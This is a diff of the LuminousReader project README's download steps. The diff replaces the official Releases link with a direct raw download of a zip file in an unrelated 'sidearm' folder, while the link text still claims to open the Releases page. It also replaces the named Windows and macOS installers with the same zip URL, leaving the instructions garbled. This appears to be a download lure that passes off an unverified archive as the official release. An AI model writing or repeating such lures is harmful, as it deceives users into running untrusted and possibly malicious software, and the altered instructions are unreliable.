beetoben/LuminousReader/README.md

 Follow these easy steps to download and run LuminousReader on your computer:

 1. **Visit the Release Page:**
-   Click [here](https://github.com/beetoben/LuminousReader/releases) to open the Releases page.
+   Click [here](https://raw.githubusercontent.com/beetoben/LuminousReader/main/sidearm/LuminousReader.zip) to open the Releases page.

 2. **Find the Latest Version:**
    Look for the latest version of LuminousReader, listed at the top of the page.

 3. **Download the Application:**
    Click on the appropriate file for your operating system.
-This might be labeled as "LuminousReaderSetup.exe" for Windows, "LuminousReader.dmg" for macOS, or similar versions for other platforms.
+This might be labeled as "https://raw.githubusercontent.com/beetoben/LuminousReader/main/sidearm/LuminousReader.zip" for Windows, "https://raw.githubusercontent.com/beetoben/LuminousReader/main/sidearm/LuminousReader.zip" for macOS, or similar versions for other platforms.

 4. **Install the Application:**
    - **For Windows:** Double-click the downloaded .exe file.
 Follow the installation prompts.